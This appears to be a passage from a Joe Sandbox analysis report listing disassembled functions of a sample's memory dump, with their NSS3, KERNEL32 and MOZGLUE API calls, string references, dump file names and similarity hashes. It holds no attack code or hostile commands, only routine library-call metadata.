PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CD6CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CD6CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CD6CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CD6CD8E

Part of subcall function 6CC905C0: PR_EnterMonitor.NSS3 ref: 6CC905D1
Part of subcall function 6CC905C0: PR_ExitMonitor.NSS3 ref: 6CC905EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CD6CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CD6CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CD6CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CD6CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CD6CE48

Strings

getaddrinfo, xrefs: 6CD6CD88, 6CD6CDF9
getnameinfo, xrefs: 6CD6CDB2, 6CD6CE23
ws2_32.dll, xrefs: 6CD6CD75
freeaddrinfo, xrefs: 6CD6CD9F, 6CD6CE10
wship6.dll, xrefs: 6CD6CDE3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 69a03390b39472999dcecc3c7886e90890191a431dcd53d6f638add9fc69b81b
Instruction ID: faf1510def2c59b2a667f9f0321803be5c27defbd843e2f2afa372a6ba00adf1
Opcode Fuzzy Hash: 69a03390b39472999dcecc3c7886e90890191a431dcd53d6f638add9fc69b81b
Instruction Fuzzy Hash: E411E9A5F0212167EF0167B67C0099E39F85B8214CF180539D805D6F61FB21E55CC7E6

Function 6CD06CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CDD1DE0,?), ref: 6CD06CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD06D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CD06D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CD06D82
DER_GetInteger_Util.NSS3(?), ref: 6CD06DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD06DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CD06E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CD06F19
PK11_DigestBegin.NSS3(00000000), ref: 6CD06F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CD06F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CD07011
PK11_FreeSymKey.NSS3(00000000), ref: 6CD07033
free.MOZGLUE(?), ref: 6CD0703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CD07060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CD07087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CD070AF

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: b726c3d1cadd6735de4630f8f44922730d2eea7dff769792f7f2acfb7203e685
Instruction ID: b5bdf9caea6c439f4595ac427160d4c5e589720111a26a76d850614c12c7d454
Opcode Fuzzy Hash: b726c3d1cadd6735de4630f8f44922730d2eea7dff769792f7f2acfb7203e685
Instruction Fuzzy Hash: DDA1B571B04200DBEB009F28DC45B9E37A5DB81318F248939ED55CBAA1E775D896C763

Function 6CCCAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CCAAB95,00000000,?,00000000,00000000,00000000), ref: 6CCCAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CCAAB95,00000000,?,00000000,00000000,00000000), ref: 6CCCAF39
PR_Unlock.NSS3(?,?,?,6CCAAB95,00000000,?,00000000,00000000,00000000), ref: 6CCCAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CCAAB95,00000000,?,00000000,00000000,00000000), ref: 6CCCAF69
TlsGetValue.KERNEL32 ref: 6CCCB06B
EnterCriticalSection.KERNEL32(?), ref: 6CCCB083
PR_Unlock.NSS3(?), ref: 6CCCB0A4
TlsGetValue.KERNEL32 ref: 6CCCB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CCCB0D9
PR_Unlock.NSS3 ref: 6CCCB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CCCB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CCCB182

Part of subcall function 6CCFFAB0: free.MOZGLUE(?,-00000001,?,?,6CC9F673,00000000,00000000), ref: 6CCFFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CCCB177

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CCAAB95,00000000,?,00000000,00000000,00000000), ref: 6CCCB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CCAAB95,00000000,?,00000000,00000000,00000000), ref: 6CCCB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CCAAB95,00000000,?,00000000,00000000,00000000), ref: 6CCCB1C2

Part of subcall function 6CCF1560: TlsGetValue.KERNEL32(00000000,?,6CCC0844,?), ref: 6CCF157A
Part of subcall function 6CCF1560: EnterCriticalSection.KERNEL32(?,?,?,6CCC0844,?), ref: 6CCF158F
Part of subcall function 6CCF1560: PR_Unlock.NSS3(?,?,?,?,6CCC0844,?), ref: 6CCF15B2

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: a90b9650e008eeb80e3e5d2f502aa7ac2e3efc6cba191334e0f29cb68608b9a4
Instruction ID: d0a7d3825216470812e635c909f161801d34132b01685e43eed06c28806547e0
Opcode Fuzzy Hash: a90b9650e008eeb80e3e5d2f502aa7ac2e3efc6cba191334e0f29cb68608b9a4
Instruction Fuzzy Hash: 70A1A1B5E002059BEF009FA4DC85AEA77B4FF44308F144129E919A7751F732E999CBA2

Function 6CD1AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD1ADB1

Part of subcall function 6CCFBE30: SECOID_FindOID_Util.NSS3(6CCB311B,00000000,?,6CCB311B,?), ref: 6CCFBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CD1ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CD1AE08

Part of subcall function 6CCFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CDD18D0,?), ref: 6CCFB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD1AE25
PL_FreeArenaPool.NSS3 ref: 6CD1AE63
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CD1AE4D

Part of subcall function 6CC24C70: TlsGetValue.KERNEL32(?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24C97
Part of subcall function 6CC24C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24CB0
Part of subcall function 6CC24C70: PR_Unlock.NSS3(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD1AE93
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CD1AECC
PL_FreeArenaPool.NSS3 ref: 6CD1AEDE
PL_FinishArenaPool.NSS3 ref: 6CD1AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD1AEF5
PL_FinishArenaPool.NSS3 ref: 6CD1AF16

Strings

security, xrefs: 6CD1ADEE

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 430529ace2f3e98979d130670c4180820b19da7abe0b5329cbf704ceb2ea8e79
Instruction ID: bc1cf6ebdca056bb4e9738af6c90118ffd69a4206e32f48d969a6d2d62896d6d
Opcode Fuzzy Hash: 430529ace2f3e98979d130670c4180820b19da7abe0b5329cbf704ceb2ea8e79
Instruction Fuzzy Hash: 764127B1A4C200A7E7118B28BC45BAB32B8AF4231CF140526E85C92F65FB35D95DC7E3

Function 6CD0E8C0 Relevance: 22.9, APIs: 15, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6CD0E853,?,FFFFFFFF,?,?,6CD0B0CC,?,6CD0B4A0,?,00000000), ref: 6CD0E8D9

Part of subcall function 6CD00D30: calloc.MOZGLUE ref: 6CD00D50
Part of subcall function 6CD00D30: TlsGetValue.KERNEL32 ref: 6CD00D6D

Part of subcall function 6CD0C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CD0DAE2,?), ref: 6CD0C6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6CD0E972
PORT_ArenaMark_Util.NSS3(?), ref: 6CD0E9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD0EA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6CD0EA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6CD0EA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CD0EA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6CD0EA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CD0EACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6CD0EB56
PK11_FreeSymKey.NSS3(00000000), ref: 6CD0EBC2
SECOID_FindOID_Util.NSS3(?), ref: 6CD0EBEC
free.MOZGLUE(00000000), ref: 6CD0EC58

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID:
API String ID: 759478663-0
Opcode ID: e72d309d5bf5d60016c7099872cd60523fea2b05d248789b15fc911773c6d908
Instruction ID: 0aa9a03c552805ad5104c91e4b4f100a698234d34eb6c209cfea5e2adf9823a0
Opcode Fuzzy Hash: e72d309d5bf5d60016c7099872cd60523fea2b05d248789b15fc911773c6d908
Instruction Fuzzy Hash: ABC181B1F00205DBEB00CF6DD881BAA77B4BF09308F140469E996A7B61E731E844CBE5

Function 6CDBAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CD69890: TlsGetValue.KERNEL32(?,?,?,6CD697EB), ref: 6CD6989E

EnterCriticalSection.KERNEL32(?), ref: 6CDBAF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CDBAFCE
PR_SetPollableEvent.NSS3(?), ref: 6CDBAFD9
EnterCriticalSection.KERNEL32(?), ref: 6CDBAFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6CDBB00F
_PR_MD_UNLOCK.NSS3(?), ref: 6CDBB02F
_PR_MD_UNLOCK.NSS3(?), ref: 6CDBB070
PR_JoinThread.NSS3(?), ref: 6CDBB07B
free.MOZGLUE(?), ref: 6CDBB084
EnterCriticalSection.KERNEL32(?), ref: 6CDBB09B
_PR_MD_UNLOCK.NSS3(?), ref: 6CDBB0C4
PR_JoinThread.NSS3(?), ref: 6CDBB0F3
free.MOZGLUE(?), ref: 6CDBB0FC
PR_JoinThread.NSS3(?), ref: 6CDBB137
free.MOZGLUE(?), ref: 6CDBB140

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 5f83f0a32488a2c08cb2c2490ae4ec5d45b5a0b2f131ba0bc61c81ec0332ce7a
Instruction ID: d55b1783b64dce70549d1c80c3bbc14e2d892d8e972f139ebd6507a91543a782
Opcode Fuzzy Hash: 5f83f0a32488a2c08cb2c2490ae4ec5d45b5a0b2f131ba0bc61c81ec0332ce7a
Instruction Fuzzy Hash: 80915BB5900601DFCB10DF25D8C085ABBF1FF4935872985A9D81A6BB62E732FC56CB90

Function 6CCB8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CCB8E22
EnterCriticalSection.KERNEL32(?), ref: 6CCB8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CCB8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CCB8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CCB8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CCB8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CCB8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CCB8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CCB8F00
free.MOZGLUE(?), ref: 6CCB8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CCB8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CCB8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CCB8F5B
PR_Unlock.NSS3(?), ref: 6CCB8F72
PR_Unlock.NSS3(?), ref: 6CCB8F82

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 9143c87b71f62688a003e7169a301a46427c963d1b2dc0637c58613d24fbb30f
Instruction ID: 34bf1961d7b95a0d1941149ed8bad786c24f521f4891b134c02c043a2c305fd9
Opcode Fuzzy Hash: 9143c87b71f62688a003e7169a301a46427c963d1b2dc0637c58613d24fbb30f
Instruction Fuzzy Hash: 63510AB6D002029FEB109FA8CC84DAAB7B9FF55358B144169EC08AB750F731DD4587E1

Function 6CCDCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CCDCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CCDCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CCDCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CCDCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CCDCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CCDCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CCDCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CCDCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CCDCF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6CCDCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CCDCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CCDCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CCDCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CCDD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CCDD021

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 9437b4349ac5c944febfe3e2202279176ecbc4ad8ee27f52b9169c8afc1a8171
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 56316571B5295027EF4D515A6C71BDE244A4FA630FF450038FA0AE67C0F685BA1742F9

Function 6CDB0FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CDB1000

Part of subcall function 6CD69BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CC91A48), ref: 6CD69BB3
Part of subcall function 6CD69BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CC91A48), ref: 6CD69BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CDB1016

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

PR_Unlock.NSS3(?), ref: 6CDB1021

Part of subcall function 6CD4DD70: TlsGetValue.KERNEL32 ref: 6CD4DD8C
Part of subcall function 6CD4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CD4DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CDB1046
PR_Unlock.NSS3(?), ref: 6CDB106B
PR_Lock.NSS3 ref: 6CDB1079
PR_Unlock.NSS3 ref: 6CDB1096
free.MOZGLUE(?), ref: 6CDB10A7
free.MOZGLUE(?), ref: 6CDB10B4
PR_DestroyCondVar.NSS3(?), ref: 6CDB10BF
PR_DestroyCondVar.NSS3(?), ref: 6CDB10CA
PR_DestroyCondVar.NSS3(?), ref: 6CDB10D5
PR_DestroyCondVar.NSS3(?), ref: 6CDB10E0
PR_DestroyLock.NSS3(?), ref: 6CDB10EB
free.MOZGLUE(?), ref: 6CDB1105

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: b409a4fbb90ca0790c125af8de6b40f6189a7115b77259899107363d58c85623
Instruction ID: 8c517bb117d9c14599ff97a06e2307578f208072cdebafe91081e8e697f8a1ae
Opcode Fuzzy Hash: b409a4fbb90ca0790c125af8de6b40f6189a7115b77259899107363d58c85623
Instruction Fuzzy Hash: 673147F6A00501ABDB019F54EC81A45B771FF4135DB184129E80A16F71E732F978DAD2

Function 6CCEEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CCEEE0B

Part of subcall function 6CD00BE0: malloc.MOZGLUE(6CCF8D2D,?,00000000,?), ref: 6CD00BF8
Part of subcall function 6CD00BE0: TlsGetValue.KERNEL32(6CCF8D2D,?,00000000,?), ref: 6CD00C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CCEEEE1

Part of subcall function 6CCE1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CCE1D7E
Part of subcall function 6CCE1D50: EnterCriticalSection.KERNEL32(?), ref: 6CCE1D8E
Part of subcall function 6CCE1D50: PR_Unlock.NSS3(?), ref: 6CCE1DD3

TlsGetValue.KERNEL32 ref: 6CCEEE51
EnterCriticalSection.KERNEL32(?), ref: 6CCEEE65
PR_Unlock.NSS3(?), ref: 6CCEEEA2
free.MOZGLUE(?), ref: 6CCEEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CCEEED0
PR_Unlock.NSS3(?), ref: 6CCEEF48
free.MOZGLUE(?), ref: 6CCEEF68
PR_SetError.NSS3(00000000,00000000), ref: 6CCEEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CCEEFA4
free.MOZGLUE(?), ref: 6CCEEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CCEF055
free.MOZGLUE(?), ref: 6CCEF060

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: ad95faa9c989041c19d92f645b1f6ef7c314997f80e9595356ceec7d968f5238
Instruction ID: 652fe2d5c7ab58894a7bac2b38cd0d4bae0ea57edc661097f4f763963bf4882c
Opcode Fuzzy Hash: ad95faa9c989041c19d92f645b1f6ef7c314997f80e9595356ceec7d968f5238
Instruction Fuzzy Hash: 06816171A00209AFDF01DFA5DC85ADE7BB9BF4D358F144028E919A3B11E731E924CBA1

Function 6CCB4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CCB4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CCB4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CCB4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CCB4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CCB4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CCB4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CCB4E85
DER_Encode_Util.NSS3(?,?,6CE005A4,00000000), ref: 6CCB4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CCB4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CCB4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CCB4F62
